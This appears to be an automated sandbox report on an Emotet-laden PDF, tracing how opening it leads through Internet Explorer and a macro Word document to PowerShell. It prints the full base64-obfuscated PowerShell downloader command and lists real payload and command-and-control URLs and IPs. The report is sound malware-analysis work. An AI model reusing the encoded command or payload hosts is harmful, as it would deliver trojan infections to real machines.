File name: | 2019_03- Balance & Payment Report.pdf |
Full analysis: | https://app.any.run/tasks/3eebe883-b074-49e5-b61e-c778d8e3c80d |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | March 14, 2019, 17:32:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/pdf |
File info: | PDF document, version 1.3 |
MD5: | 3F448D817D1E53DB9B3F42EAB71C3F35 |
SHA1: | 0730EAD04D5F72B9E8AD8AF2034B0ABA6D5F0588 |
SHA256: | 2BF5229D74CF8FE0F0E7304630B7743FB471C3F209AB91FDCDE48DCB566D4133 |
SSDEEP: | 12288:Calr+T/VM7s5Kz+NjoPexpU/uYtSxFQQRj4j:HS/WgKz+VHXYmQQRj4j |
| | Adobe Portable Document Format (100) |
ModifyDate: | 2019:03:14 17:43:06+03:00 |
---|---|
CreateDate: | 2019:03:14 17:43:06+03:00 |
Producer: | dompdf + CPDF |
PageCount: | 2 |
Linearized: | No |
PDFVersion: | 1.3 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2964 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\Desktop\2019_03- Balance & Payment Report.pdf" | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | explorer.exe | |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe Acrobat Reader DC Version: 15.23.20070.215641 | ||||
3072 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer "C:\Users\admin\Desktop\2019_03- Balance & Payment Report.pdf" | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | — | AcroRd32.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe Acrobat Reader DC Version: 15.23.20070.215641 | ||||
2976 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16448250 | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | — | AcroRd32.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe RdrCEF Version: 15.23.20053.211670 | ||||
2420 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --disable-direct-write --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.23.20053 Chrome/45.0.2454.85" --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="2976.0.984069801\1029609654" --allow-no-sandbox-job /prefetch:673131151 | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | — | RdrCEF.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe RdrCEF Version: 15.23.20053.211670 | ||||
2572 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --disable-direct-write --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.23.20053 Chrome/45.0.2454.85" --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="2976.1.957481628\1921284041" --allow-no-sandbox-job /prefetch:673131151 | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | — | RdrCEF.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe RdrCEF Version: 15.23.20053.211670 | ||||
2856 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | AcroRd32.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3552 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2856 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3864 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\INSTR765132416821[1].doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3068 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3380 | powershell -e KAAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIABJAG8ALgBjAG8AbQBwAHIARQBTAFMASQBvAE4ALgBEAEUARgBMAEEAVABlAHMAdABSAGUAQQBNACgAIABbAEkATwAuAG0ARQBtAG8AUgB5AHMAVAByAGUAQQBNAF0AIABbAHMAWQBzAHQAZQBNAC4AYwBvAG4AVgBFAFIAVABdADoAOgBGAHIAbwBtAEIAQQBzAGUANgA0AFMAdABSAEkAbgBHACgAIAAoACcAWABaAEoAJwArACcAUgBhADkAcwB3ACcAKwAnAEYASQBYACcAKwAnAC8AJwArACcAaQBoADQATQBTAHMAaABpAE4AOAAnACsAJwBWAGoAVQAnACsAJwBHAFAAJwArACcAbwBqAGIAJwArACcAVQBaACcAKwAnAHQANgB6ACcAKwAnAEQAcgBHACcAKwAnAGEAYgBHAFEAJwArACcAUgAnACsAJwBiACcAKwAnAHYAYgBGACcAKwAnAFYAJwArACcAMgA1ACcAKwAnAEsAUgBsAGQAaAB0ACcAKwAnAHkASAArAGYAMQBpACcAKwAnAFcAaABUAEkAKwBYAGoAMwBQAE8AUABWAGYAJwArACcATwBMAHoAOQBqAEUANABTAFUAcAB5AHcASABSACcAKwAnAGcATwBIAEEAWQBNADEAaABCAEwASABwAFMAJwArACcAcQBmAGsAUgB2AHkAZwBNACcAKwAnAGIAJwArACcAOQBnACcAKwAnAFcAWAAnACsAJwBVAEMAcABRAG0AYwBEADQAcgBBAEcAQgBwACcAKwAnAFMARwB0AGoAJwArACcAKwBoACcAKwAnAHYAUABNAHoAJwArACcAcwB0AGgAYQB5AEcAJwArACcASABwAEgAWABMAGwAJwArACcAZQBkAHAAegB2AGYAMQB4ADkAJwArACcAZgB2ACcAKwAnAGQAMQBRAGUAYgBjAG4ANgAnACsAJwByACcAKwAnAFgAUQBSACcAKwAnAFMAawBLAEsAYgBCAEMAcABTACcAKwAnAHQAMAAnACsAJwBlAFYAbQA0AGYAZQB1AEoAcgBxAGgAJwArACcAdwA4AE8ANABlAEwAJwArACcAdQBSACcAKwAnAGcAOQAnACsAJwBLADYAJwArACcAcQAnACsAJwBXAGkAJwArACcAdgBKAE4AUgBaACcAKwAnAEcANwBQAEYATgBkAE8AeQAnACsAJwBYAFgARQAnACsAJwBsAGoASQAnACsAJwAzAGgAZgAnACsAJwByACsANwAvACcAKwAnADAAJwArACcAWQBQACcAKwAnAEYAOQAyAGkAZAAnACsAJwB0ACcAKwAnAFMAJwArACcAaAAnACsAJwBjACcAKwAnADgAZgBTAGUAZQBmAHgAMgBFAGQAUgAnACsAJwBxACcAKwAnAEcAJwArACcAQQBxAGgAOABlAFYATgA1ADIAJwArACcAUgAnACsAJwBZAGIAegAnACsAJwAzAHEAJwArACcAZgB1ADkAYgBZACcAKwAnAFcAYgAnACsAJwAwAGwAcwA0ACcAKwAnAEQAQgAyAEQAVAByAEoAbwA4AHAAQgAnACsAJwBIADcAdQAxADkAdQBxACsAZwAyAGsAJwArACcASABNACcAKwAnAEEARQAnACsAJwBoAEoAJwArACcANgAvAGUAbgBhAEQAcAAnACsAJwBJADAANQBSAEMAJwArACcASAB0AEoAdwBnACcAKwAnAFoAdAAnACsAJwBEAFkAeQBSADEATQBMAEYAcgBEAEsAbgAnACsAJwBSAFEANwBtADkAMgBBACsAcAAnACsAJwBlAHEANgAxAG8AYwAnACsAJwBVAEYALwAwADgAVgAnACsAJwBaAFkAVQAnACsAJwBGAGQAJwArACcAbgBKAEEARwBXADIAVQAzACcAKwAnADQAdgBYAE0AUwBWACcAKwAnAGYAYwBsAGsAeQBFAEoATwBjACcAKwAnADYANQB3AGUAJwArACcAagBYACcAKwAnAHcAJwArACcANgBuACcAKwAnADkAbAAyACcAKwAnAG0AJwArACcAUgAnACsAJwB0AG0AcQA0AHUAbQBMAFYAVAAnACsAJwByACcAKwAnAFQASAA4AGoARgB6ACcAKwAnAGMAJwArACcAWgBOAGYAcQA2ACcAKwAnAGgAaQBUAE0AZQAwAHYAcwB4ADgAOABjAEkAVQBoACcAKwAnAG8AawBXAHoAJwArACcASwBiAHgAJwArACcAVwBpAFcAaQBjACcAKwAnAEgAdQBIAGUAMgAyAEsAQwB0AFQAawAyAFcARgAnACsAJwB4AEwAKwB5AGIAMAA0AE8AaQBkAHkAcgBCAHYAJwArACcAOAAnACsAJwBqADcAZgBYAGoAVABaAFoARwAnACsAJwBJAFgAMwAnACsAJwBrAFUAMgBaADcAcwBCACsAaQAnACsAJwB0ACcAKwAnAEoARwBiADQASABqAGsAaAAnACsAJwBlACcAKwAnAEgAMQA0AFgAJwArACcAaAAwACcAKwAnAEkAcwBZAG0AJwArACcAUAAnACsAJwA4ACcAKwAnADUAJwArACcAWQBTAEoAOABCAHMAagB5AHoAeABuACcAKwAnADgAJwArACcAQQAnACkAIAApACAALAAgAFsAUwB5AFMAdABFAG0ALgBJAG8ALgBjAG8AbQBQAHIAZQBzAHMAaQBPAE4ALgBDAG8ATQBQAFIAZQBTAHMAaQBvAE4ATQBvAEQARQBdADoAOgBEAEUAQwBPAG0AUAByAEUAcwBTACkAfAAgACUAewAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIAAgAGkATwAuAHMAdABSAGUAQQBtAFIARQBBAEQARQBSACgAJABfACAALAAgAFsAVABlAFgAdAAuAEUAbgBDAG8ARABpAG4AZwBdADoAOgBBAFMAYwBJAEkAIAApAH0AfAAgACUAIAB7ACAAJABfAC4AUgBFAGEARABUAE8AZQBuAEQAKAAgACkAfQAgACkAfAAgAGkATgBWAE8AawBFAC0ARQBYAHAAUgBFAFMAUwBpAG8AbgA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3072) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\ExitSection |
Operation: | write | Name: | bLastExitNormal |
Value: 0 | |||
(PID) Process: | (3072) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral |
Operation: | write | Name: | bExpandRHPInViewer |
Value: 1 | |||
(PID) Process: | (3072) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\NoTimeOut |
Operation: | write | Name: | smailto |
Value: 5900 | |||
(PID) Process: | (2964) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1 |
Operation: | write | Name: | aFS |
Value: DOS | |||
(PID) Process: | (2964) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1 |
Operation: | write | Name: | tDIText |
Value: /C/Users/admin/Desktop/2019_03- Balance & Payment Report.pdf | |||
(PID) Process: | (2964) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1 |
Operation: | write | Name: | tFileName |
Value: 2019_03- Balance & Payment Report.pdf | |||
(PID) Process: | (2964) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1 |
Operation: | write | Name: | tFileSource |
Value: local | |||
(PID) Process: | (2964) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1 |
Operation: | write | Name: | sFileAncestors |
Value: 5B5D00 | |||
(PID) Process: | (2964) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1 |
Operation: | write | Name: | sDI |
Value: 2F432F55736572732F61646D696E2F4465736B746F702F323031395F30332D2042616C616E63652026205061796D656E74205265706F72742E70646600 | |||
(PID) Process: | (2964) AcroRd32.exe | Key: | HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1 |
Operation: | write | Name: | sDate |
Value: 443A32303139303331343137333331335A00 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3072 | AcroRd32.exe | C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal | — | |
MD5:— | SHA256:— | |||
2856 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
2856 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
2856 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFD14519C23AEBE80A.TMP | — | |
MD5:— | SHA256:— | |||
3864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR14EE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3072 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R9ppkbx_dz1r3p_2dc.tmp | — | |
MD5:— | SHA256:— | |||
3072 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R1fgwgj0_dz1r3o_2dc.tmp | — | |
MD5:— | SHA256:— | |||
3072 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R1hhmnf5_dz1r3n_2dc.tmp | — | |
MD5:— | SHA256:— | |||
3072 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9Rojsjjf_dz1r3m_2dc.tmp | — | |
MD5:— | SHA256:— | |||
3864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_935A8FCE-864B-457B-A248-FECB3059B5A1.0\7FE41546.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2964 | AcroRd32.exe | GET | 304 | 2.16.186.32:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip | unknown | — | — | whitelisted |
2964 | AcroRd32.exe | GET | 304 | 2.16.186.32:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip | unknown | — | — | whitelisted |
3552 | iexplore.exe | GET | 200 | 1.53.252.161:80 | http://kowil.com.vn/wp-admin/lpmj-855ev-sgveuhw/ | VN | document | 137 Kb | suspicious |
2160 | wabmetagen.exe | GET | — | 187.233.152.78:443 | http://187.233.152.78:443/ | MX | — | — | malicious |
2964 | AcroRd32.exe | GET | 304 | 2.16.186.32:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/278_15_23_20070.zip | unknown | — | — | whitelisted |
2964 | AcroRd32.exe | GET | 304 | 2.16.186.32:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip | unknown | — | — | whitelisted |
3564 | wabmetagen.exe | GET | — | 187.233.152.78:443 | http://187.233.152.78:443/ | MX | — | — | malicious |
3520 | iexplore.exe | GET | 200 | 1.53.252.161:80 | http://kowil.com.vn/wp-admin/lpmj-855ev-sgveuhw/ | VN | document | 137 Kb | suspicious |
2964 | AcroRd32.exe | GET | 304 | 2.16.186.32:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip | unknown | — | — | whitelisted |
2748 | powershell.exe | GET | 200 | 178.128.41.189:80 | http://turningspeech.com/rm44r5z/usg/ | GR | executable | 359 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2856 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2964 | AcroRd32.exe | 2.16.186.32:80 | acroipm2.adobe.com | Akamai International B.V. | — | whitelisted |
3856 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3520 | iexplore.exe | 1.53.252.161:80 | kowil.com.vn | The Corporation for Financing & Promoting Technology | VN | suspicious |
3380 | powershell.exe | 178.128.41.189:80 | turningspeech.com | Forthnet | GR | suspicious |
3552 | iexplore.exe | 1.53.252.161:80 | kowil.com.vn | The Corporation for Financing & Promoting Technology | VN | suspicious |
— | — | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
2964 | AcroRd32.exe | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
— | — | 184.51.8.204:443 | ardownload2.adobe.com | Akamai Technologies, Inc. | US | whitelisted |
2748 | powershell.exe | 178.128.41.189:80 | turningspeech.com | Forthnet | GR | suspicious |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
kowil.com.vn |
| suspicious |
acroipm2.adobe.com |
| whitelisted |
armmf.adobe.com |
| whitelisted |
turningspeech.com |
| suspicious |
ardownload2.adobe.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3552 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY Office Document Download Containing AutoOpen Macro |
3380 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3380 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3380 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3380 | powershell.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
3520 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY Office Document Download Containing AutoOpen Macro |
2748 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2748 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2748 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2748 | powershell.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |